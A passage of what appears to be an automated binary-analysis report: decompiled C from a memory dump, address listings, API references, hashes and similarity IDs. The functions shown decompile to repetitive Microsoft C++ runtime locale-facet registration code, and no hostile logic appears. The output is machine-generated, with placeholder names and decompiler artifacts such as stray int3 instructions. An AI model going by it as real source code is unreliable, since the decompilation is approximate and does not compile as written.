																			_t446 =  *0x6de96de0; // 0x0
																			 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																			 *(_t462 - 0x10) = _t446;
																			_t218 = E6DDB161C(0x6de96d8c);
																			_t365 =  *((intOrPtr*)(_t462 + 8));
																			_t435 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t218);
																			__eflags = _t435;
																			if(_t435 != 0) {
																				L40:
																				E6DDD66BA(_t462 - 0x14);
																				return E6DDF0075(_t435);
																			} else {
																				__eflags = _t446;
																				if(_t446 == 0) {
																					_push( *((intOrPtr*)(_t462 + 8)));
																					_push(_t462 - 0x10);
																					__eflags = E6DDE1471(_t327, _t365, _t428, _t435, _t446) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t462 - 0x20);
																						E6DDF3D74(_t462 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t327, _t435, _t446, 0x14);
																						E6DDD6653(_t462 - 0x14, 0);
																						_t447 =  *0x6de96dfc; // 0x0
																						 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																						 *(_t462 - 0x10) = _t447;
																						_t231 = E6DDB161C(0x6de96da8);
																						_t372 =  *((intOrPtr*)(_t462 + 8));
																						_t436 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t231);
																						__eflags = _t436;
																						if(_t436 != 0) {
																							L47:
																							E6DDD66BA(_t462 - 0x14);
																							return E6DDF0075(_t436);
																						} else {
																							__eflags = _t447;
																							if(_t447 == 0) {
																								_push( *((intOrPtr*)(_t462 + 8)));
																								_push(_t462 - 0x10);
																								__eflags = E6DDE14EC(_t327, _t372, _t428, _t436, _t447) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t462 - 0x20);
																									E6DDF3D74(_t462 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t327, _t436, _t447, 0x14);
																									E6DDD6653(_t462 - 0x14, 0);
																									_t448 =  *0x6de96dcc; // 0x0
																									 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																									 *(_t462 - 0x10) = _t448;
																									_t244 = E6DDB161C(0x6de96d80);
																									_t379 =  *((intOrPtr*)(_t462 + 8));
																									_t437 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t244);
																									__eflags = _t437;
																									if(_t437 != 0) {
																										L54:
																										E6DDD66BA(_t462 - 0x14);
																										return E6DDF0075(_t437);
																									} else {
																										__eflags = _t448;
																										if(_t448 == 0) {
																											_push( *((intOrPtr*)(_t462 + 8)));
																											_push(_t462 - 0x10);
																											__eflags = E6DDE1558(_t327, _t379, _t428, _t437, _t448) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t462 - 0x20);
																												E6DDF3D74(_t462 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t327, _t437, _t448, 0x14);
																												E6DDD6653(_t462 - 0x14, 0);
																												_t449 =  *0x6de96e00; // 0x0
																												 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																												 *(_t462 - 0x10) = _t449;
																												_t257 = E6DDB161C(0x6de96dac);
																												_t386 =  *((intOrPtr*)(_t462 + 8));
																												_t438 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t257);
																												__eflags = _t438;
																												if(_t438 != 0) {
																													L61:
																													E6DDD66BA(_t462 - 0x14);
																													return E6DDF0075(_t438);
																												} else {
																													__eflags = _t449;
																													if(_t449 == 0) {
																														_push( *((intOrPtr*)(_t462 + 8)));
																														_push(_t462 - 0x10);
																														__eflags = E6DDE15C4(_t327, _t386, _t428, _t438, _t449) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t462 - 0x20);
																															E6DDF3D74(_t462 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t327, _t438, _t449, 0x14);
																															E6DDD6653(_t462 - 0x14, 0);
																															_t450 =  *0x6de96dd0; // 0x0
																															 *(_t462 - 4) =  *(_t462 - 4) & 0x00000000;
																															 *(_t462 - 0x10) = _t450;
																															_t270 = E6DDB161C(0x6de96d60);
																															_t393 =  *((intOrPtr*)(_t462 + 8));
																															_t439 = E6DDB171B( *((intOrPtr*)(_t462 + 8)), _t270);
																															__eflags = _t439;
																															if(_t439 != 0) {
																																L68:
																																E6DDD66BA(_t462 - 0x14);
																																return E6DDF0075(_t439);
																															} else {
																																__eflags = _t450;
																																if(_t450 == 0) {
																																	_push( *((intOrPtr*)(_t462 + 8)));
																																	_push(_t462 - 0x10);
																																	__eflags = E6DDE162A(_t327, _t393, _t428, _t439, _t450) - 0xffffffff;
																																	if(__eflags == 0) {
																																		_t397 = _t462 - 0x20;
																																		E6DDB1438(_t397);
																																		E6DDF3D74(_t462 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de3851f, _t327, _t439, _t450, 4);
																																		_t451 = _t397;
																																		 *(_t462 - 0x10) = _t451;
																																		 *((intOrPtr*)(_t451 + 4)) =  *((intOrPtr*)(_t462 + 0xc));
																																		_push( *((intOrPtr*)(_t462 + 0x14)));
																																		_t147 = _t462 - 4;
																																		 *_t147 =  *(_t462 - 4) & 0x00000000;
																																		__eflags =  *_t147;
																																		 *_t451 = 0x6de3c0c4;
																																		 *((char*)(_t451 + 0x28)) =  *((intOrPtr*)(_t462 + 0x10));
																																		E6DDE542F(_t327, _t397, _t428, _t439, _t451,  *_t147);
																																		return E6DDF0075(_t451,  *((intOrPtr*)(_t462 + 8)));
																																	} else {
																																		_t439 =  *(_t462 - 0x10);
																																		 *(_t462 - 0x10) = _t439;
																																		 *(_t462 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t439);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t439 + 4))))();
																																		 *0x6de96dd0 = _t439;
																																		goto L68;
																																	}
																																} else {
																																	_t439 = _t450;
																																	goto L68;
																																}
																															}
																														} else {
																															_t438 =  *(_t462 - 0x10);
																															 *(_t462 - 0x10) = _t438;
																															 *(_t462 - 4) = 1;
																															E6DDD6FD3(__eflags, _t438);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t438 + 4))))();
																															 *0x6de96e00 = _t438;
																															goto L61;
																														}
																													} else {
																														_t438 = _t449;
																														goto L61;
																													}
																												}
																											} else {
																												_t437 =  *(_t462 - 0x10);
																												 *(_t462 - 0x10) = _t437;
																												 *(_t462 - 4) = 1;
																												E6DDD6FD3(__eflags, _t437);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t437 + 4))))();
																												 *0x6de96dcc = _t437;
																												goto L54;
																											}
																										} else {
																											_t437 = _t448;
																											goto L54;
																										}
																									}
																								} else {
																									_t436 =  *(_t462 - 0x10);
																									 *(_t462 - 0x10) = _t436;
																									 *(_t462 - 4) = 1;
																									E6DDD6FD3(__eflags, _t436);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t436 + 4))))();
																									 *0x6de96dfc = _t436;
																									goto L47;
																								}
																							} else {
																								_t436 = _t447;
																								goto L47;
																							}
																						}
																					} else {
																						_t435 =  *(_t462 - 0x10);
																						 *(_t462 - 0x10) = _t435;
																						 *(_t462 - 4) = 1;
																						E6DDD6FD3(__eflags, _t435);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t435 + 4))))();
																						 *0x6de96de0 = _t435;
																						goto L40;
																					}
																				} else {
																					_t435 = _t446;
																					goto L40;
																				}
																			}
																		} else {
																			_t434 =  *(_t462 - 0x10);
																			 *(_t462 - 0x10) = _t434;
																			 *(_t462 - 4) = 1;
																			E6DDD6FD3(__eflags, _t434);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t434 + 4))))();
																			 *0x6de96ddc = _t434;
																			goto L33;
																		}
																	} else {
																		_t434 = _t445;
																		goto L33;
																	}
																}
															} else {
																_t433 =  *(_t462 - 0x10);
																 *(_t462 - 0x10) = _t433;
																 *(_t462 - 4) = 1;
																E6DDD6FD3(__eflags, _t433);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t433 + 4))))();
																 *0x6de96db0 = _t433;
																goto L26;
															}
														} else {
															_t433 = _t444;
															goto L26;
														}
													}
												} else {
													_t432 =  *(_t462 - 0x10);
													 *(_t462 - 0x10) = _t432;
													 *(_t462 - 4) = 1;
													E6DDD6FD3(__eflags, _t432);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t432 + 4))))();
													 *0x6de96dd8 = _t432;
													goto L19;
												}
											} else {
												_t432 = _t443;
												goto L19;
											}
										}
									} else {
										_t431 =  *(_t462 - 0x10);
										 *(_t462 - 0x10) = _t431;
										 *(_t462 - 4) = 1;
										E6DDD6FD3(__eflags, _t431);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t431 + 4))))();
										 *0x6de96dc4 = _t431;
										goto L12;
									}
								} else {
									_t431 = _t442;
									goto L12;
								}
							}
						} else {
							_t430 =  *(_t462 - 0x10);
							 *(_t462 - 0x10) = _t430;
							 *(_t462 - 4) = 1;
							E6DDD6FD3(__eflags, _t430);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t430 + 4))))();
							 *0x6de96dc8 = _t430;
							goto L5;
						}
					} else {
						_t430 = _t441;
						goto L5;
					}
				}
			}

0x6dddf6b3
0x6dddf6b3
0x6dddf6ba
0x6dddf6c4
0x6dddf6c9
0x6dddf6d4
0x6dddf6d8
0x6dddf6db
0x6dddf6e0
0x6dddf6e4
0x6dddf6e9
0x6dddf6ed
0x6dddf732
0x6dddf735
0x6dddf741
0x6dddf6ef
0x6dddf6f1
0x6dddf6f7
0x6dddf6fd
0x6dddf705
0x6dddf708
0x6dddf745
0x6dddf753
0x6dddf758
0x6dddf760
0x6dddf76a
0x6dddf76f
0x6dddf77a
0x6dddf77e
0x6dddf781
0x6dddf786
0x6dddf78f
0x6dddf791
0x6dddf793
0x6dddf7d8
0x6dddf7db
0x6dddf7e7
0x6dddf795
0x6dddf795
0x6dddf797
0x6dddf79d
0x6dddf7a3
0x6dddf7ab
0x6dddf7ae
0x6dddf7eb
0x6dddf7f9
0x6dddf7fe
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf835
0x6dddf837
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d
0x6dddf7b0
0x6dddf7b0
0x6dddf7b3
0x6dddf7b7
0x6dddf7bb
0x6dddf7c8
0x6dddf7d0
0x6dddf7d2
0x00000000
0x6dddf7d2
0x6dddf799
0x6dddf799
0x00000000
0x6dddf799
0x6dddf797
0x6dddf70a
0x6dddf70a
0x6dddf70d
0x6dddf711
0x6dddf715
0x6dddf722
0x6dddf72a
0x6dddf72c
0x00000000
0x6dddf72c
0x6dddf6f3
0x6dddf6f3
0x00000000
0x6dddf6f3
0x6dddf6f1

APIs

__EH_prolog3.LIBCMT ref: 6DDDF6BA
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF6C4
int.LIBCPMT ref: 6DDDF6DB

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

moneypunct.LIBCPMT ref: 6DDDF6FE
std::_Facet_Register.LIBCPMT ref: 6DDDF715
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF735
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF753

Strings

|mm, xrefs: 6DDDF6CF

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID: |mm
API String ID: 113178234-2398550710
Opcode ID: 8c7e4f039575384d17dfd30c42ce0945d7013e064f679a1a90bb3da8df4cdd83
Instruction ID: cee5503f70c73b35fcba8a2d9db0ea0da376db1286e34c82d85a95dcc00c96cd
Opcode Fuzzy Hash: 8c7e4f039575384d17dfd30c42ce0945d7013e064f679a1a90bb3da8df4cdd83
Instruction Fuzzy Hash: B911C275908559EBCF01FBA4C840AFDB7B4AF84318F260009F521AB290DF74DA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF0DD, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDF0DD(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t279;
				signed int _t280;
				void* _t292;
				void* _t305;
				void* _t318;
				void* _t331;
				void* _t344;
				void* _t357;
				void* _t370;
				void* _t383;
				void* _t396;
				void* _t409;
				void* _t422;
				void* _t435;
				void* _t448;
				void* _t461;
				void* _t474;
				void* _t487;
				void* _t500;
				void* _t513;
				signed int _t739;
				signed int _t800;
				signed int _t801;
				signed int _t802;
				signed int _t803;
				signed int _t804;
				signed int _t805;
				signed int _t806;
				signed int _t807;
				signed int _t808;
				signed int _t809;
				signed int _t810;
				signed int _t811;
				signed int _t812;
				signed int _t813;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t817;
				signed int _t819;
				signed int _t820;
				signed int _t821;
				signed int _t822;
				signed int _t823;
				signed int _t824;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				signed int _t828;
				signed int _t829;
				signed int _t830;
				signed int _t831;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				void* _t858;

				_t797 = __edx;
				_t606 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t858 - 0x14, 0);
				_t819 =  *0x6de96dd4; // 0x0
				 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
				 *(_t858 - 0x10) = _t819;
				_t279 = E6DDB161C(0x6de96b28);
				_t609 =  *((intOrPtr*)(_t858 + 8));
				_t280 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t279);
				_t799 = _t280;
				if(_t280 != 0) {
					L5:
					E6DDD66BA(_t858 - 0x14);
					return E6DDF0075(_t799);
				} else {
					if(_t819 == 0) {
						_push( *((intOrPtr*)(_t858 + 8)));
						_push(_t858 - 0x10);
						__eflags = E6DDE0E47(__ebx, _t609, __edx, _t799, _t819) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t858 - 0x20);
							E6DDF3D74(_t858 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t799, _t819, 0x14);
							E6DDD6653(_t858 - 0x14, 0);
							_t820 =  *0x6de96de8; // 0x0
							 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
							 *(_t858 - 0x10) = _t820;
							_t292 = E6DDB161C(0x6de96d94);
							_t616 =  *((intOrPtr*)(_t858 + 8));
							_t800 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t292);
							__eflags = _t800;
							if(_t800 != 0) {
								L12:
								E6DDD66BA(_t858 - 0x14);
								return E6DDF0075(_t800);
							} else {
								__eflags = _t820;
								if(_t820 == 0) {
									_push( *((intOrPtr*)(_t858 + 8)));
									_push(_t858 - 0x10);
									__eflags = E6DDE0EB7(_t606, _t616, __edx, _t800, _t820) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t858 - 0x20);
										E6DDF3D74(_t858 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t606, _t800, _t820, 0x14);
										E6DDD6653(_t858 - 0x14, 0);
										_t821 =  *0x6de96db8; // 0x0
										 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
										 *(_t858 - 0x10) = _t821;
										_t305 = E6DDB161C(0x6de96d6c);
										_t623 =  *((intOrPtr*)(_t858 + 8));
										_t801 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t305);
										__eflags = _t801;
										if(_t801 != 0) {
											L19:
											E6DDD66BA(_t858 - 0x14);
											return E6DDF0075(_t801);
										} else {
											__eflags = _t821;
											if(_t821 == 0) {
												_push( *((intOrPtr*)(_t858 + 8)));
												_push(_t858 - 0x10);
												__eflags = E6DDE0F1F(_t606, _t623, __edx, _t801, _t821) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t858 - 0x20);
													E6DDF3D74(_t858 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t606, _t801, _t821, 0x14);
													E6DDD6653(_t858 - 0x14, 0);
													_t822 =  *0x6de96dec; // 0x0
													 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
													 *(_t858 - 0x10) = _t822;
													_t318 = E6DDB161C(0x6de96d98);
													_t630 =  *((intOrPtr*)(_t858 + 8));
													_t802 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t318);
													__eflags = _t802;
													if(_t802 != 0) {
														L26:
														E6DDD66BA(_t858 - 0x14);
														return E6DDF0075(_t802);
													} else {
														__eflags = _t822;
														if(_t822 == 0) {
															_push( *((intOrPtr*)(_t858 + 8)));
															_push(_t858 - 0x10);
															__eflags = E6DDE0F87(_t606, _t630, _t797, _t802, _t822) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t858 - 0x20);
																E6DDF3D74(_t858 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t606, _t802, _t822, 0x14);
																E6DDD6653(_t858 - 0x14, 0);
																_t823 =  *0x6de96dbc; // 0x0
																 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																 *(_t858 - 0x10) = _t823;
																_t331 = E6DDB161C(0x6de96d70);
																_t637 =  *((intOrPtr*)(_t858 + 8));
																_t803 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t331);
																__eflags = _t803;
																if(_t803 != 0) {
																	L33:
																	E6DDD66BA(_t858 - 0x14);
																	return E6DDF0075(_t803);
																} else {
																	__eflags = _t823;
																	if(_t823 == 0) {
																		_push( *((intOrPtr*)(_t858 + 8)));
																		_push(_t858 - 0x10);
																		__eflags = E6DDE0FEF(_t606, _t637, _t797, _t803, _t823) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t858 - 0x20);
																			E6DDF3D74(_t858 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t606, _t803, _t823, 0x14);
																			E6DDD6653(_t858 - 0x14, 0);
																			_t824 =  *0x6de96df0; // 0x0
																			 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																			 *(_t858 - 0x10) = _t824;
																			_t344 = E6DDB161C(0x6de96d9c);
																			_t644 =  *((intOrPtr*)(_t858 + 8));
																			_t804 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t344);
																			__eflags = _t804;
																			if(_t804 != 0) {
																				L40:
																				E6DDD66BA(_t858 - 0x14);
																				return E6DDF0075(_t804);
																			} else {
																				__eflags = _t824;
																				if(_t824 == 0) {
																					_push( *((intOrPtr*)(_t858 + 8)));
																					_push(_t858 - 0x10);
																					__eflags = E6DDE1057(_t606, _t644, _t797, _t804, _t824) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t858 - 0x20);
																						E6DDF3D74(_t858 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t606, _t804, _t824, 0x14);
																						E6DDD6653(_t858 - 0x14, 0);
																						_t825 =  *0x6de96dc0; // 0x0
																						 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																						 *(_t858 - 0x10) = _t825;
																						_t357 = E6DDB161C(0x6de96d74);
																						_t651 =  *((intOrPtr*)(_t858 + 8));
																						_t805 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t357);
																						__eflags = _t805;
																						if(_t805 != 0) {
																							L47:
																							E6DDD66BA(_t858 - 0x14);
																							return E6DDF0075(_t805);
																						} else {
																							__eflags = _t825;
																							if(_t825 == 0) {
																								_push( *((intOrPtr*)(_t858 + 8)));
																								_push(_t858 - 0x10);
																								__eflags = E6DDE10BF(_t606, _t651, _t797, _t805, _t825) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t858 - 0x20);
																									E6DDF3D74(_t858 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t606, _t805, _t825, 0x14);
																									E6DDD6653(_t858 - 0x14, 0);
																									_t826 =  *0x6de96df8; // 0x0
																									 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																									 *(_t858 - 0x10) = _t826;
																									_t370 = E6DDB161C(0x6de96da4);
																									_t658 =  *((intOrPtr*)(_t858 + 8));
																									_t806 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t370);
																									__eflags = _t806;
																									if(_t806 != 0) {
																										L54:
																										E6DDD66BA(_t858 - 0x14);
																										return E6DDF0075(_t806);
																									} else {
																										__eflags = _t826;
																										if(_t826 == 0) {
																											_push( *((intOrPtr*)(_t858 + 8)));
																											_push(_t858 - 0x10);
																											__eflags = E6DDE1127(_t606, _t658, _t797, _t806, _t826) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t858 - 0x20);
																												E6DDF3D74(_t858 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t606, _t806, _t826, 0x14);
																												E6DDD6653(_t858 - 0x14, 0);
																												_t827 =  *0x6de96df4; // 0x0
																												 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																												 *(_t858 - 0x10) = _t827;
																												_t383 = E6DDB161C(0x6de96da0);
																												_t665 =  *((intOrPtr*)(_t858 + 8));
																												_t807 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t383);
																												__eflags = _t807;
																												if(_t807 != 0) {
																													L61:
																													E6DDD66BA(_t858 - 0x14);
																													return E6DDF0075(_t807);
																												} else {
																													__eflags = _t827;
																													if(_t827 == 0) {
																														_push( *((intOrPtr*)(_t858 + 8)));
																														_push(_t858 - 0x10);
																														__eflags = E6DDE11AB(_t606, _t665, _t797, _t807, _t827) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t858 - 0x20);
																															E6DDF3D74(_t858 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t606, _t807, _t827, 0x14);
																															E6DDD6653(_t858 - 0x14, 0);
																															_t828 =  *0x6de96dc8; // 0x0
																															 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																															 *(_t858 - 0x10) = _t828;
																															_t396 = E6DDB161C(0x6de96d7c);
																															_t672 =  *((intOrPtr*)(_t858 + 8));
																															_t808 = E6DDB171B( *((intOrPtr*)(_t858 + 8)), _t396);
																															__eflags = _t808;
																															if(_t808 != 0) {
																																L68:
																																E6DDD66BA(_t858 - 0x14);
																																return E6DDF0075(_t808);
																															} else {
																																__eflags = _t828;
																																if(_t828 == 0) {
																																	_push( *((intOrPtr*)(_t858 + 8)));
																																	_push(_t858 - 0x10);
																																	__eflags = E6DDE1230(_t606, _t672, _t797, _t808, _t828) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t858 - 0x20);
																																		E6DDF3D74(_t858 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t606, _t808, _t828, 0x14);
																																		E6DDD6653(_t858 - 0x14, 0);
																																		_t829 =  *0x6de96dc4; // 0x0
																																		 *(_t858 - 4) =  *(_t858 - 4) & 0x00000000;
																																		 *(_t858 - 0x10) = _t829;
																																		_t409 = E6DDB161C(0x6de96d78);
																																		_t679 =  *((intOrPtr*)(_t858 + 8));
